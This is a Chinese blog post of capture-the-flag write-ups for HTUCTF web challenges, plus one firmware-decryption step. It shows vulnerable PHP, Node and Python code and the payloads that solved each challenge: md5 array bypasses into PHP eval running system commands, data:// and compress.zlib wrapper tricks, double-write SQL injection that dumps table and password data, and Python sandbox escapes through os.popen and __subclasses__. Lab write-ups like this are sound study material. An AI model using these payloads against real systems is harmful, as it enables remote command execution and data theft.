6.IDA打开emncig这个文件分析一下查看一下打印信息查看每个参数的作用 -d是加密 -s是签名 (签名和解密有关),大致分析了一下是一个AES256 CBC模式的加密

7.现在只要执行这个encimg文件,这是一个MIPS架构32位大端的程序需要事情qemu模拟执行,但是缺少签名想起来旧固件中的signature拿来尝试解密,解密成功binwalk解包新固件

8.查看flag文件夹下的flag.txt获得flag

WEB

debugme_签到

题目

你是开发人员吗?
题目难度:签到

我的解答:

签到题,控制台就有答案。

easy_rce

题目

最简单的RCE,eval函数是非常危险的!
你能逃过md5的围追堵截吗?
题目难度:简单

 <?php
highlight_file(__FILE__);
error_reporting(0);
if($_GET['from']=="HTUCTF"){
    if((md5($_GET['m1']) == md5($_GET['m2'])) && ($_GET['m1'] !== $_GET['m2'])){
        eval($_POST['cmd']);
    }else{
        die("you cant put the same md5 value into here");
    }
}else{
    die("Wrong?Where are you from<br>");
}


?>
Wrong?Where are you from

我的解答:

rce签到题。直接打

GET传参(数组绕过就行):?from=HTUCTF&m1[]=123&m2[]=456

POST传参(注意:此flag不在根目录就在当前目录):cmd=system("cat flag");

HTUCTF{8cdae6c6-2f02-4c3f-9f75-4fd21098600d}

evalPHP

题目

做web开发的首要安全指南:
不要对任何用户输入的数据保持信任!!一定要做安全检查!!!
但很显然小明觉得嗤之以鼻,他觉得没人能够在一个必定报错的语句上进行执行
你能够找到方法绕过并获得flag吗?
难度:中等偏难

PHP文件包含漏洞

 <?php
highlight_file(__FILE__);
$data = file_get_contents($_GET['file']);
if($data === "HTUCTF"){
    $cmd = $_POST['cmd'];
    eval($cmd."No_What_are_you_doing!!!");
}else{
    die("no,where are you from");
}
?>

Warning: file_get_contents(): Filename cannot be empty in /var/www/html/index.php on line 3
no,where are you from

我的解答:

提示说了:PHP文件包含漏洞

当然不说也能看出来哈哈哈,确实贴心!

dirsearch扫后台发现flag.php,然后可以利用data://伪协议打。

GET传参:?file=data://text/plain;base64,SFRVQ1RG

注1SFRVQ1RG是HTUCTFbase64加密值。因为需要加密一下,不加密的话正常是打不通的(已试)。

POST传参:cmd=system("tac flag.php");?>

注2:这里用tac绕过,正常cat不行。

HTUCTF{15e0cd0a-3f7e-49c3-abaa-d81badb9898e}

evalPHP卷土重来

题目

修复了非预期,这次是真的中等偏难了

 <?php
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file)){
    if(preg_match("/^http|^ftp|^https|^data|^phar|^zip/i", $file)){
        die("bad hacker!!!");
    }
    $data = file_get_contents($file);
    if($data === "HTUCTF"){
        $cmd = $_POST['cmd'];
        if(preg_replace("/_|\(|\)|;|\w+|'|\s+|\*/", "", $cmd) === ""){
            eval($cmd."No_What_are_you_doing!!!");
        }else{
            die("No!!!!");
        }
        
    }else{
        die("no,where are you from");
    }
}
?>

我的解答:

GET上传 ?file=compress.zlib://data://text/plian,HTUCTF

POST上传 cmd=system('tac f*');__halt_compiler();

HTUCTF{2c392f42-573b-4580-bb4b-613502d6bc04}

easy_SQL

题目

简单的SQL注入
题目难度:中等

我的解答:

有waf,双写绕过即可。

payload为:

爆数据库名:
-admin'uunionnion/**/sselectelect/**/database()#

爆表名:
-admin'uunionnion/**/sselectelect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='users'#

爆字段名:
-admin'uunionnion/**/sselectelect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users'#

爆flag:
-admin'uunionnion/**/sselectelect/**/group_concat(passwoorrd)/**/from/**/users#

HTUCTF{41f789fe-643c-4322-be0a-f05eaa584340}

eznode

题目

喜欢我们前后端通吃的javascript吗

可以先了解一下js和http协议的内容

const { readFileSync } = require('fs')
const express = require('express')

const flag = process.env['FLAG']
const app = express()
app.get("/", (req, res) => {
    res.setHeader('Content-Type', 'text/plain');
    res.send(readFileSync("./app.js", 'utf-8'))
})

app.get("/get_var", (req, res) => {
    let check = req.header("Check")
    if (check && check == [[[[[[[114514]]]]]]]) {
        let vara = req.query['var']
        if (vara && /^[a-zA-Z]+$/.test(vara)) {
            res.send(eval(vara))
        } else {
            res.send('invalid input!')
        }    
    } else {
        res.send("check failed")
    }
})

app.listen(80, () => {
    console.log("listening at 0.0.0.0:80");
});

我的解答:

简单题。payload如下:

GET传参 /get_var?var=flag 

添加头 check: 114514

flag{41dd607d-0ecb-475d-96ef-813da205430e}

python_eval_easy

题目

在这次,我们似乎获得了eval之神的宠爱,他散发出特殊的气味,把我们带到了此地
他拥有神秘的力量,能够帮你把语句变为现实
你知道python如何getshell吗?
题目难度:中等偏易

我的解答:

控制台发现/tell?me=xxx

典型的沙盒了。用%过滤。payload如下:

/tell?me=__import__(%22os%22).popen(%22cat%20/f*%22).read()

HTUCTF{a48bcee4-9d76-46a4-8ad4-51a9f44955ea}

EvalIt!!!

题目

这次,看来eval之神的网络不太好啊?你还能够获取到eval之神的信任吗?
题目难度:中等

我的解答:

/tell?me=open('app.py').read()查看源码

len(data) < 28 有长度限制,直接转到/BackDoorsInGuoql路由下打

import requests
url = "http://xxx.xxx.xxx.xx:xxxxx/BackDoorsInGuoql"
data = {"eval": "str(''.__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read())"}
response = requests.get(url=url,data=data)
print(response.text)

 

 

posted @ 2024-05-05 22:20  Kicky_Mu  阅读(279)  评论(0编辑  收藏  举报